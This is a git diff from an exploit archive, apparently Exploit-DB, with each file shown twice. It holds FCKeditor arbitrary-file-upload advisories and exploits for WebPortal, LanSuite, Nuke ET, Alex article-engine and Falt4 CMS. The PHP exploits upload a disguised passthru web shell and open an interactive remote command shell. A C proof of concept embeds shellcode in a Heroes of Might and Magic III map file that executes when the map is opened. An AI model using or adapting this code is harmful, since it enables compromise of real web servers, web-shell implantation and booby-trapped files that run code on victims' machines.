*http://www.site.com/editor/filemanager/upload/test.html
*
*http://www.zanfi.nl
##############################################################
##############################################################
# milw0rm.com [2008-09-10]

View file

@ -1,47 +1,47 @@
########################################################################
#
# S.W.A.T.
#
# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
#
# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
#
# Discover by : S.W.A.T.
#
# svvateam@yahoo.com
#
# Impact: Medium
#
# Fix: Disable It In The Config File ;)
#
# Site: wWw.SvvaT.IR
#
########################################################################
####################
- Exploit:
####################
http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Demo:
####################
http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
All My Friend's , Str0ke
####################
# milw0rm.com [2008-09-12]
########################################################################
#
# S.W.A.T.
#
# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
#
# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
#
# Discover by : S.W.A.T.
#
# svvateam@yahoo.com
#
# Impact: Medium
#
# Fix: Disable It In The Config File ;)
#
# Site: wWw.SvvaT.IR
#
########################################################################
####################
- Exploit:
####################
http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Demo:
####################
http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
All My Friend's , Str0ke
####################
# milw0rm.com [2008-09-12]

View file

@ -1,28 +1,28 @@
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-09-25]
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-09-25]

View file

@ -1,132 +1,132 @@
<?php
/*
---------------------------------------------------------------
Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
---------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.truzone.org/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
147. function FileUpload( $resourceType, $currentFolder )
148. {
149. $sErrorNumber = '0' ;
150. $sFileName = '' ;
151.
152. if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
153. {
154. $oFile = $_FILES['NewFile'] ;
155.
156. // Map the virtual path to the local server path.
157. $sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
158.
159. // Get the uploaded file name.
160. $sFileName = $oFile['name'] ;
161. $sOriginalFileName = $sFileName ;
162. // Security fix by truzone 01-15-2006
163. //$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
164. //$sExtension = strtolower( $sExtension ) ;
165.
166. if(extension_loaded("mime_magic")){
167. $sExtension = mime_content_type($oFile['tmp_name']);
168. }else{
169. $sExtension = $oFile['type'];
170. }
171. // en of security fix by truzone 01-15-2006
172. global $Config ;
173.
174. $arAllowed = $Config['AllowedExtensions'][$resourceType] ;
175. $arDenied = $Config['DeniedExtensions'][$resourceType] ;
An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /nukeet/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nnukeet-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2008-10-18]
<?php
/*
---------------------------------------------------------------
Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
---------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.truzone.org/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
147. function FileUpload( $resourceType, $currentFolder )
148. {
149. $sErrorNumber = '0' ;
150. $sFileName = '' ;
151.
152. if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
153. {
154. $oFile = $_FILES['NewFile'] ;
155.
156. // Map the virtual path to the local server path.
157. $sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
158.
159. // Get the uploaded file name.
160. $sFileName = $oFile['name'] ;
161. $sOriginalFileName = $sFileName ;
162. // Security fix by truzone 01-15-2006
163. //$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
164. //$sExtension = strtolower( $sExtension ) ;
165.
166. if(extension_loaded("mime_magic")){
167. $sExtension = mime_content_type($oFile['tmp_name']);
168. }else{
169. $sExtension = $oFile['type'];
170. }
171. // en of security fix by truzone 01-15-2006
172. global $Config ;
173.
174. $arAllowed = $Config['AllowedExtensions'][$resourceType] ;
175. $arDenied = $Config['DeniedExtensions'][$resourceType] ;
An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /nukeet/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nnukeet-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2008-10-18]

View file

@ -1,51 +1,51 @@
########################################################################
#
# Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- how To use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################
# milw0rm.com [2008-11-19]
########################################################################
#
# Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- how To use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################
# milw0rm.com [2008-11-19]

View file

@ -1,95 +1,95 @@
################################################################
#
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
#
# Bug Discovered By : Sp3shial
#
# Sp3shial@ymail.com
#
# Persian Boys Hacking Team From A Land With A History-Long Background
#
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
#
###############################################################
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /Falt4/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nFalt4-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2009-02-16]
################################################################
#
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
#
# Bug Discovered By : Sp3shial
#
# Sp3shial@ymail.com
#
# Persian Boys Hacking Team From A Land With A History-Long Background
#
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
#
###############################################################
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /Falt4/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nFalt4-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2009-02-16]

View file

@ -6,6 +6,8 @@
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin <at> offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal

272
platforms/windows/local/37716.c Executable file
View file

@ -0,0 +1,272 @@
/*
# Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
# Date : 2015-07-29
# Exploit Author : John AAkerblom, Pierre Lindblad
# Website: http://h3minternals.net
# Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
# Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
# Tested on : Windows XP, Windows 8.1
# Category: exploits
# Description:
This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes
of Might and Magic III. Once the map is started in-game, a buffer overflow
occuring when loading object sprite names leads to shellcode execution.
Only basic arbitrary code execution is covered in this PoC but is possible to
craft an exploit that lets the game continue normally after the shellcode has
been executed. Using extensive knowledge of the .h3m format, it is even
possible to create a map file that loads like normal in the game's map editor
(which lacks the vulnerability) but stealthily executes shellcode when opened
in-game.
*/
#include <string.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
/* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
0xEBFE added at end. Note that a NULL-less payload is not actually needed
Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
and Peter Ferrie <peter.ferrie@gmail.com>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of the
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
static const uint8_t CALC_PAYLOAD[] = {
0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
};
/*
* The memmem() function finds the start of the first occurrence of the
* substring 'needle' of length 'nlen' in the memory area 'haystack' of
* length 'hlen'.
*
* The return value is a pointer to the beginning of the sub-string, or
* NULL if the substring is not found.
*
* Original author: caf, http://stackoverflow.com/a/2188951
*/
static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
{
uint8_t needle_first;
uint8_t *p = haystack;
size_t plen = hlen;
if (!nlen)
return NULL;
needle_first = *(uint8_t *)needle;
while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
{
if (!memcmp(p, needle, nlen))
return p;
p++;
plen = hlen - (p - haystack);
}
return NULL;
}
#ifdef _MSC_VER
#pragma warning(disable:4996) // M$ fopen so unsafe
#endif
#pragma pack(push, 1)
// exploit struct
// .h3m files contain an array of object attributes - OA - in which each
// entry starts with a string length and then a string for an object sprite.
// This exploit overflows the stack with a malicious sprite name.
struct exploit_oa_t
{
uint32_t size; // size of the rest of this struct, including shellcode
// The rest of the struct is the sprite name for the OA, <size> bytes of
// which an CALL ESP-gadget address is placed so that it overwrites the
// return address, when ESP is called shellcode2 will be executed. An
// additional 2 "anticrash" gadgets are needed so the game does not crash
// before returning to the CALL ESP-gadget.
uint8_t nullbyte; // Must be 0x00, terminating sprite name
uint8_t overwritten[6]; // Overwritten by game
uint8_t shellcode1[121]; // Mostly not used, some is overwritten
uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
// anticrash_gadget1, needs to pass the following code down to final JMP:
//
// MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
// XOR EBX, EBX
// CMP EAX, EBX
// JE SHORT <crash spot> ; JMP to crash if EAX is 0
// MOV CL, BYTE PTR DS : [EAX - 1]
// CMP CL, BL
// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
// CMP CL, 0FF
// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
// CPU Disasm
// CMP EDI, EBX
// JNE <good spot> ; JMP to good spot. Always occurs if we get this far
uint32_t anticrash_gadget1;
// anticrash_gadget2, needs to return out of the following call (tricky):
//
// MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
// CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
uint32_t anticrash_gadget2;
// Here at 144 bytes into this struct comes the shellcode that will be
// executed. For the game to survive, it is wise to use this only for a
// short jmp as doing so means only 2 values have to be restored on the
// stack. Namely: original return address and format value of the h3m.
// This PoC simply puts shellcode here, meaning the game cannot continue
// after shellcode execution.
uint8_t shellcode2[];
};
struct offsets_t
{
uint32_t call_esp_gadget;
uint32_t anticrash_gadget1;
uint32_t anticrash_gadget2;
};
#pragma pack(pop)
static const struct offsets_t * const TARGET_OFFSETS[] = {
(struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
(struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
};
#define TARGET_DESCS " 1: H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
" 2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
#define MAX_TARGET 2
// Name of a sprite present in all maps, this is overwritten with exploit
#define NEEDLE "AVWmrnd0.def"
int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
{
uint8_t *buf = NULL;
uint8_t *p = NULL;
long h3m_size = 0;
long bytes = 0;
struct exploit_oa_t *exp = NULL;
// Read entire h3m file into memory
fseek(h3m_f, 0, SEEK_END);
h3m_size = ftell(h3m_f);
rewind(h3m_f);
buf = malloc(h3m_size);
if (buf == NULL) {
puts("[!] Failed to allocate memory");
return 1;
}
bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
if (bytes != h3m_size) {
free(buf);
puts("[!] Failed to read all bytes");
return 1;
}
// Find game object array in .h3m, where we will overwrite the first entry
p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
if (p == NULL) {
puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
free(buf);
return 1;
}
// Move back 4 bytes from sprite name, pointing to the size of the sprite name
p -= 4;
// Overwrite the first game object with exploit
exp = (struct exploit_oa_t *)p;
exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
exp->nullbyte = 0;
exp->call_esp_gadget = ofs->call_esp_gadget;
exp->anticrash_gadget1 = ofs->anticrash_gadget1;
exp->anticrash_gadget2 = ofs->anticrash_gadget2;
memcpy(exp->shellcode2, payload, payload_size);
// Write entire file from memory and cleanup
rewind(h3m_f);
bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
if (bytes != h3m_size) {
free(buf);
puts("[!] Failed to write all bytes");
return 1;
}
free(buf);
return 0;
}
static void _print_usage(void)
{
puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");
puts("Available targets:");
puts(TARGET_DESCS);
puts("Examples:");
puts(" h3mpacker Arrogance.h3m 1");
puts(" h3mpacker Deluge.h3m 2");
}
int main(int argc, char **argv)
{
FILE *h3m_f = NULL;
int ret = 0;
int target;
if (argc != 3) {
_print_usage();
return 1;
}
h3m_f = fopen(argv[1], "rb+");
target = strtoul(argv[2], NULL, 0);
if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
if (h3m_f != NULL)
fclose(h3m_f);
_print_usage();
return 1;
}
ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
fclose(h3m_f);
if (ret != 0)
return ret;
printf("[+] Payload embedded into h3m file %s\n", argv[1]);
return 0;
}